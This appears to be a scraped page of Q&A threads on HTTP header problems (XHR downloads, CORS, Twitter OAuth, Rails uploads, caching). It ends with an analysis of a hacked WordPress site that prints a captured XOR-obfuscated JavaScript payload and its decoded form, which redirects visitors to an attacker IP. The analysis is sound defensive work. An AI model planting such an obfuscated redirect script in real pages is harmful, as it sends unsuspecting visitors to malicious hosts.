In my FCGI app I want to make server-side response in a way to make the browser (want to use the majority of them) open "Save as" dialog box and actually save the file at user hard drive.
I fail w/ this(
Here is the dump of request/response received from Chrome:
Remote Address:192.168.1.69:80
Request URL:http://192.168.1.69/sunprint/sunweb.fcgi?GETPCBSDATAASFILE2SAVE
Request Method:GET
Status Code:200 OK
Request Headers
GET /sunprint/sunweb.fcgi?GETPCBSDATAASFILE2SAVE HTTP/1.1
Host: 192.168.1.69
Connection: keep-alive
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) >Chrome/34.0.1847.116 Safari/537.36
Referer: http://192.168.1.69/sunprint/PCBsVersions.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Query String Parameters
GETPCBSDATAASFILE2SAVE
Response Headers
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 10:21:23 GMT
Server: Apache/2.2.22 (Ubuntu)
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Description: File Transfer
Content-Disposition: attachment; filename="SunSerialNumbers.txt"
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 227
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/plain
The content of my file is some set of printable ASCII symbols. BTW, should I encode the content in some way?
It seems that all the needed headers are present but browser still refuses to show the desired dialog box. Is the wrong combination of headers present?
To make a request i use the following code:
function sendCommandGetFile(url1) {
$.ajax({
url: url1,
type: "GET"
});
}
sendCommandGetFile("sunweb.fcgi?GETPCBSDATAASFILE2SAVE", function(data){});
Thanks a lot for help.
X-Requested-With: XMLHttpRequest
No set of HTTP headers is going to cause the browser to download a file it gets in response to a request using XHR.
You have three basic options.
Don't use XHR in the first place
Store the file data somewhere, give it a temporary URI, pass the URI back in the response, have the client side JS set location to that URI
Construct a data: scheme URI and have the client side JS assign it to location.
Unless you really need to sometimes return a file, and sometimes return data for JS to process (e.g. error messages) then option 1 is the best.
Related
I have some working JavaScript (running inside Firefox (v41)) which I need to modify to support cross-domain XMLHttpRequests (my POST requests retrieve JSON encoded data). I have control over the server in question, so I capture OPTIONS requests and reply with:
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: Content-Type, X-Requested-With
Access-Control-Max-Age: 86400
The browser then correctly sends the POST request, my server responds with the data and that data arrives back at my machine; I can see it in Wireshark and it is well formed JSON.
HOWEVER, the data doesn't get to my JavaScript. I can see in the Firefox window that the response to the POST request does arrive, with all the expected headers indicating (for example) 1120 bytes of content but, when I click on the "Response" tab, there is nothing in it: SyntaxError: JSON.parse: unexpected end of data at line 1 column 1 of the JSON data. My JavaScript code ends up in the XMLHttpRequest's onerror function.
What do I need to do to get my data correctly? Any advice welcomed.
Here is a sample of one complete HTTP exchange, as seen by Wireshark on the browser machine:
OPTIONS /getAllData HTTP/1.1
Host: blah:blah
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: null
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Content-Type, X-Requested-With
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 86400
Date: Fri, 26 Aug 2016 09:22:14 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
test
POST /getAllData HTTP/1.1
Host: blah:blah
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/string; charset=UTF-8
Content-Length: 4
Origin: null
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Date: Fri, 26 Aug 2016 09:22:15 GMT
Content-Length: 1121
{"wellformed":"data 1121 bytes long"}
I have toyed with Access-Control-Allow-Origin and the header needs to be implemented in each and every response that is sent to the client.
So, whenever you make that POST, the answer MUST include the ACAO header otherwise the browser will filter out the content for security purposes. I do not see the header from the capture you made, which might explain the issue.
You can take a look at the examples from Mozilla, you will see that the response to the POST do include the ACAO header.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS
Also, it seems that your body content is not separated from the header by a conventional empty line (\r\n in HTTP protocol). The body seems to be part of the header in your pastes, but it might just be a glitch from your copy-paste. If it's not then it's also a potential explanation: no body = no content.
Finally, I recommend that you debug your trafic through a tool such as BurpSuite which implements a nice Proxy allowing you not only to real-time view and edit your requests, but also to replay them and toy around. Initially a security tool, it is still great for debugging web apps.
https://portswigger.net/burp/
I have no idea what's going on. I worked so hard to get the signature and header perfect. Everything is perfect. I compared it with the oauth tool here:
https://dev.twitter.com/oauth/tools/signature-generator/
However I keep getting:
status: 401
statusText: Unauthorized
response: {"errors":[{"code":32,"message":"Could not authenticate you."}]}
I read somewhere that it might be a multipart post so I need to not include the POST/query data in the signature so I tried that but I get 403:
status: 403
statusText: Forbidden
response: {"errors":[{"code":170,"message":"Missing required parameter: status."}]}
Does anyone know what can possibly be going on? I don't know what code to share, because everything is matching perfectly. I upgrade a request token to an access token with this same algorithm ( but of course in this call the oauth_token_secret is not used). I also use the same exact method to upload an gif for attachment to tweet and it works prefectly, of course though the difference here is the upload is a multipart so I have to make it not use the post data or query parameters in the signature base string.
I amm of course generating new header per request. And my token is acccess token not request token.
Here are the headers for the tweet:
https://api.twitter.com/1.1/statuses/update.json
POST /1.1/statuses/update.json HTTP/1.1
Host: api.twitter.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: OAuth oauth_consumer_key="......", oauth_nonce="Cdo4tSOnRkOhxOAxMJWwjrnpB2qUYyjQXfnv5kes", oauth_signature="LyRDKV44MGYxCk3TNEm8lrCPUeg%3D", oauth_signature_method="HMAC-SHA1", oauth_timestamp="1466330342", oauth_token="15......97-ivs............rPqXxBk", oauth_version="1.0"
Content-Length: 17
Content-Type: text/plain;charset=UTF-8
Cookie: ...........
Connection: keep-alive
status=Hellohiiii
HTTP/2.0 401 Unauthorized
Content-Encoding: gzip
Content-Length: 89
Content-Type: application/json; charset=utf-8
Date: Sun, 19 Jun 2016 09:58:52 GMT
Server: tsa_a
Strict-Transport-Security: max-age=631138519
x-connection-hash: 1db624e689db4dc937d06c68e7318aa9
x-response-time: 6
x-tsa-request-body-time: 1
X-Firefox-Spdy: h2
Does anyone have any ideas?
Edit:
Because the multipart formdata submits fine, I am suspecting it is the post data I am sending. When I post the data I tried with encodeURIComponent and without it. Neither had affect though, still would get 401. In the signature making I used of course without any encoding.
Wow, I had to set Content-Type: application/x-www-form-urlencoded in the headers... This should be made clear
I've been struggling with this strange problem with uploading big images to the server. I am using blueimp file image upload on client and the server is Rails 4 with carrierwave for processing images (thought it seems it doesn't get to it anyway).
As long as the image is under something like 1.2 MB, everything is ok. But as soon as the image is bigger then this, I am getting this response from server instead of a normal one:
HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf8
X-Pow-Template: error_starting_application
Connection: keep-alive
Transfer-Encoding: chunked
The server, according to development.log, is performing a simple "Completed 201 Created in 1402ms", as is defined in routes.rb (no action is performed, though). The header sent to the server is:
POST /images HTTP/1.1
Host: mysite.dev
Connection: keep-alive
Content-Length: 1081439
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://mysite.dev
X-CSRF-Token: ynCLWDzF90l3BhmMcmxF+KCFiws3tnQiFAuWp+Buqcw=
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.65 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT5ZwwFlboJY4Cz7n
Referer: http://mysite.dev/images/new
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,ru;q=0.6
I don't really understand what I am doing wrong, since my client settings don't really differ much from the ones specified in Blueimp's demo:
url: "/images"
paramName: "image[image]"
type: "POST"
dataType: "json"
formData: ""
disableImageResize: false
acceptFileTypes: /(\.|\/)(gif|jpe?g|png)$/i
The code for controller action is
def create
#image = Image.create image_params
respond_with #image, layout: false
end
And in case of smaller files everything goes smoothly:
HTTP/1.1 201 Created
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-UA-Compatible: chrome=1
Location: http://mysite.dev/images/298
Content-Type: application/json; charset=utf-8
ETag: "410e24f50d02125716bfc46eb7850c1f"
Cache-Control: max-age=0, private, must-revalidate
X-Request-Id: 40e527d0-e16a-4a4e-a2e5-6124d8e639ff
X-Runtime: 1.533655
Connection: close
The header sent from the client is the same, so no difference here. I guess there could be some problems with my server configuration (not accepting big files), but I cannot find it.
Thank you for your help!
UPD: Found the reason, it was actually pow that caused all the trouble. Everything works perfectly with native server running.
On Firefox 12, when I consecutively request two resources with the same URI but with different request headers (different accept fields), response is the cached response of the first request. First request is text/html request of the page which is correctly returned and the second request is like this:
Requested URL is: http://localhost:8080/test/ with these headers:
Response Headers
Content-Type text/html;charset=ISO-8859-1
Date Sun, 29 Apr 2012 19:41:53 GMT
Server Apache-Coyote/1.1
Request Headers
Accept application/json
Accept-Encoding gzip, deflate
Accept-Language en-us,en;q=0.5
Connection keep-alive
Cookie JSESSIONID=DB75F9F730D72D040CB5781903B60E87
Host localhost:8080
Referer http://localhost:8080/test/
User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
X-Requested-With XMLHttpRequest
Do you have any suggestions to avoid this problem? Thanks in advance.
If your server is sending different content based on different Accept headers, it should be sending "Vary: Accept" to tell caches that the Accept header needs to be part of the cache key. Is your server doing that?
Use cache:false in the $.ajax({...}) params. This adds a random value to the querystring so it ensures no caching happens.
use the following line to apply cache false to all ajax request made using jquery
$.ajaxSetup({ cache: false });
more options of ajaxSetup
One of my friends has website running with Wordpress (note that is not a blog in Wordpress.com), and it has been hacked. He has to talk with the company that provided the site for restoring a backup, in the mean time. I'd like to know what has happened, because I'm trying to learn about web security and this is a good chance.
The first thing I can note is that the web page appears without style even when there are CSS files referenced from the HTML. I try to navigate to one of those files, but I get redirected to a website named tonycar.com .
The Wordpress version is 2.0.2, as I can see in the html <meta name="generator" content="WordPress 2.0.2" />
So, it is like this :
Request to http://myfriendwebsite.net/:
GET http://myfriendwebsite.net/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-IE
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: myfriendwebsite.net
Response:
HTTP/1.1 200 OK
Date: Mon, 20 Jun 2011 22:05:28 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.myfriendwebsite.net/wordpress/xmlrpc.php
Set-Cookie: bb2_screener_=1308607528+213.191.238.24; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
The response contains the HTML code. Now the web site tries to get the CSS files, this is what happens with the first for example:
Request:
GET http://www.myfriendwebsite.net/wordpress/wp-content/themes/myfriendwebsite/includes/core.css HTTP/1.1
Accept: text/css
Referer: http://myfriendwebsite.net/
Accept-Language: en-IE
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.myfriendwebsite.net
Connection: Keep-Alive
Cookie: bb2_screener_=1308607528+213.191.238.24
Response:
HTTP/1.1 302 Found
Date: Mon, 20 Jun 2011 22:05:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Location: http://tonycar.com/r/404.php?213.191.238.24
Content-Length: 402
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved here.</p>
<hr>
<address>Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.myfriendwebsite.net Port 80</address>
</body></html>
That makes a redirection to http://tonycar.com/r/404.php?213.191.238.24, and this is what happens:
Request:
GET http://tonycar.com/r/404.php?213.191.238.24 HTTP/1.1
Accept: text/css
Referer: http://myfriendwebsite.net/
Accept-Language: en-IE
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tonycar.com
Connection: Keep-Alive
Response
HTTP/1.1 302 Moved Temporarily
Date: Mon, 20 Jun 2011 22:05:42 GMT
Server: Apache
Set-Cookie: xxx=xxx; expires=Mon, 20-Jun-2011 23:05:42 GMT
Location: go.php?dd41dcd4bcb38e25c529f150f00ecf95
Content-Length: 0
Connection: close
Content-Type: text/html
A new redirection and finally:
Request
GET http://tonycar.com/r/go.php?dd41dcd4bcb38e25c529f150f00ecf95 HTTP/1.1
Accept: text/css
Referer: http://myfriendwebsite.net/
Accept-Language: en-IE
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tonycar.com
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 20 Jun 2011 22:05:44 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
2da
<script language=JavaScript>HaSyJGVMNHBHlTVzQCrn1 = "=rbshqu!uxqd<#udyu.k`w`rbshqu#?w`s!yyy<#iuuq;..099/338/81/76.hoedy/qiq>nbu0l<GD1RkCgHj1`NhvxLBXxWSiPY'OV6D<DVBWTJ#ycH1W[WBynVGSOS'6uj<106IVBH'ix<$3GY'nmQ<D5$3CYmyWUTu4J2['JwR2<Q1QFE7N00C8X1778NBXN9Q7B1E8'o3<l5sYRW#SGmeNh#uD'twff<$3CXDyfN2WJgj1KQmD5PmKJEUOx`o9#[f[1#2XNLUHvHf$2E$2E'07<0[R3F893K60'[Wh<BjHJh1rP#9tHDn#:enbtldou/mnb`uhno/isdg<yyy:=.rbshqu?";PIIupfVDlgksHCrQJMcW2 = "";for (TdeFxzFOBwBRFKLvqgyb3 = 0; TdeFxzFOBwBRFKLvqgyb3 < HaSyJGVMNHBHlTVzQCrn1.length; TdeFxzFOBwBRFKLvqgyb3 ++) { PIIupfVDlgksHCrQJMcW2 = PIIupfVDlgksHCrQJMcW2+ String.fromCharCode (HaSyJGVMNHBHlTVzQCrn1.charCodeAt (TdeFxzFOBwBRFKLvqgyb3) ^ 1); }; document.write (PIIupfVDlgksHCrQJMcW2);</script>
0
After a little bit of work, I find out that that evil javascript function is generate this and write it to the document:
<script type="text/javascript">
var xxx="http://188.229.90.67/index.php?oct1m=FE0SjBfIk0aOiwyMCYyVRhQX&NW7E=EWCVUKAxbI0VZVCxoWFRNR&7tk=017HWCI&hy=%2FX&olP=E4%2BXlxVTUt5K3Z&KvS3=P0PGD6O11B9Y0669OCYO8P6C0D9&n2=m4rXSVARFldOiAtE&uvgg=%2BYExgO3VKfk0JPlE4QlJKDTNyan8AZgZ0A3YOMTIwIg%3D%3D&16=1ZS2G982J71&ZVi=CkIKi0sQA8uIEo";
document.location.href=xxx;
</script>
Basically, it declares a String, and after it decodes it:
varA="crazy encoding string"
varB = "";
for (varC = 0; varC < varA.length; varC ++)
{
varB = varB+ String.fromCharCode (varA.charCodeAt (varC) ^ 1);
};
document.write(varB);
So again, a new redirection, but I cannot see that request on Fiddler I don't know why, maybe because IE9 doesn't understand that or what? :S I cannot decode those parameters of the query string, probably because those are the intended names and values (or not).
What is the purpose of this hack? What are they trying to achieve?
How has been this possible? I understand what is a XSS attack (direct, reflected and DOM based), but this has nothing to do with that. The server is returning a crafted response instead the CSS file required. The CSS files are supposed to be static files that the web server returns without the action of PHP or Wordpress, so?
This kind of thing is extremely common on WordPress sites, and you will see it on other popular web applications as well.
Basically, automated bots find a website to hijack, and try a few commonly known exploits. If one works, they embed some crap into your site, as you have seen.
What they do is create links to words that go back to their sites. This is to increase their page rank and what not with search engines. The idea is that if 50,000 broken WordPress sites have the word "Viagra" linked to "my-viagra-pharmacy.info", then Google will boost that site up when people search for "Viagra".
It happens all the time. A search through your PHP files for eval() will likely turn up a few "evil" (ha! a pun) lines of code.
I don't use WordPress, but I'm also interested in this.
Have you:
Identified any culprit .htaccess files?
Investigated mod_auth_passthrough / FrontPage?
There is some sort of internal redirect occurring, which means code is either being injected, a file has been added, or an existing file has been modified. The easiest way to find out would be to:
grep your files for some identifiable text, like tonycar.com. As you pointed out, they may have obfuscated it, so you might need to use other locating techniques, such as...
sort files by modified dates and look at them manually/individually
use a file comparison tool and compare the possibly infected files, to their uninfected backups
Something that was noticed is that they are using cookie information, have you tried accessing the site with cookies disabled to see if that was a possible point of insecurity?
Great analysis of what happened. Search all your theme php files and replace all WP core files/folders.
Who is the web host?
And see How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex.
I don't know about the specifics of wordpress, but I'd investigate the actual file permissions first. To me it looks like someone was able to put a .htaccess in the wordpress/wp-content/themes/myfriendwebsite/includes/ directory. I can't easily think of another way to force a 302 redirect on what should be static content (a .css file). It actually strikes me as unlikely that an unauthorized user would be able to upload such a file to that directory. I think it more likely that someone else on the same server (I'm assuming it to be shared hosting) found that directory to be writable. Check the permissions on that directory and make sure it isn't writable by everyone on the system.